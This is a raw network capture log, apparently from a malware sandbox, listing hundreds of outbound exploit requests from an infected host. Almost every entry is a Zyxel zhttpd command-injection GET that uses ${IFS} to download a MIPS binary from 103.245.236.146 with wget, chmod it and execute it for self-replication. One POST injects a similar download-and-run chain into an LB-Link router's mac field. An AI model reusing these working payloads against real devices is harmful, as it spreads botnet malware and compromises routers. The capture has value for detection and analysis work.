                                                        Jan 28, 2024 10:12:38.122152090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        875192.168.2.144689881.197.146.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122204065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        876192.168.2.1441882123.55.121.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122236967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        877192.168.2.1455110186.242.124.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122251987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        878192.168.2.1451836102.0.3.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122293949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        879192.168.2.1452626192.73.173.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122334957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        880192.168.2.1448766137.115.121.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122389078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        881192.168.2.143979841.129.178.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122433901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        882192.168.2.14466405.225.192.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122467995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        883192.168.2.1445244105.180.179.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122531891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        884192.168.2.145128239.89.238.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122575998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        885192.168.2.1451462123.150.241.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122612000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        886192.168.2.1434176164.246.198.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122668028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        887192.168.2.145015034.210.132.235443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122694969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        888192.168.2.1440944155.68.139.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122725964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        889192.168.2.1443856166.70.88.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122750044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        890192.168.2.1450502153.232.235.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122797966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        891192.168.2.1458616156.2.128.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122817039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        892192.168.2.1449008113.78.234.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122844934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        893192.168.2.143954436.163.225.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122879982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        894192.168.2.1435344194.245.103.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122906923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        895192.168.2.143369231.197.19.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122940063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        896192.168.2.143905689.141.123.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.122987032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        897192.168.2.1448200166.114.156.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123025894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        898192.168.2.1451062159.103.229.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123049021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        899192.168.2.1456024142.121.120.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123065948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        900192.168.2.1437670146.15.185.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123137951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        901192.168.2.1438886121.188.143.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123173952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        902192.168.2.145176892.148.1.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123204947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        903192.168.2.144820637.6.79.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123253107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        904192.168.2.144544683.53.121.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123308897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        905192.168.2.145075447.132.153.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123332977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        906192.168.2.145145657.93.247.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123390913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        907192.168.2.1456762107.35.27.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123430967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        908192.168.2.1441422189.156.61.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123455048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        909192.168.2.1460792172.107.149.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123497009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        910192.168.2.1451598179.152.19.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:38.123536110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        911192.168.2.1454020172.67.165.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.086144924 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
                                                        Jan 28, 2024 10:12:39.205377102 CET328INHTTP/1.1 400 Bad Request
                                                        Server: cloudflare
                                                        Date: Sun, 28 Jan 2024 09:12:39 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        CF-RAY: -
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        912192.168.2.143959048.202.15.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142786026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        913192.168.2.145667897.199.155.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142785072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        914192.168.2.144104296.157.88.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142787933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        915192.168.2.144977223.176.51.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142790079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        916192.168.2.1459102170.191.150.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142802000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        917192.168.2.1451980204.124.137.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142823935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        918192.168.2.1454328119.167.95.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142893076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        919192.168.2.1449790112.179.112.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142946959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        920192.168.2.1446698132.216.191.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.142971992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        921192.168.2.1439422188.22.255.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143042088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        922192.168.2.1450414144.123.202.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143070936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        923192.168.2.1450346200.106.19.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143127918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        924192.168.2.144801250.249.233.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143184900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        925192.168.2.1450020179.4.136.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143199921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        926192.168.2.1459184222.74.61.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143239975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        927192.168.2.1434694146.221.255.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143274069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        928192.168.2.1453720192.243.84.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143320084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        929192.168.2.1433900189.31.205.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143376112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        930192.168.2.1458070153.16.250.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:39.143394947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        931192.168.2.1459556102.248.69.167443
                                                        TimestampBytes transferredDirectionData
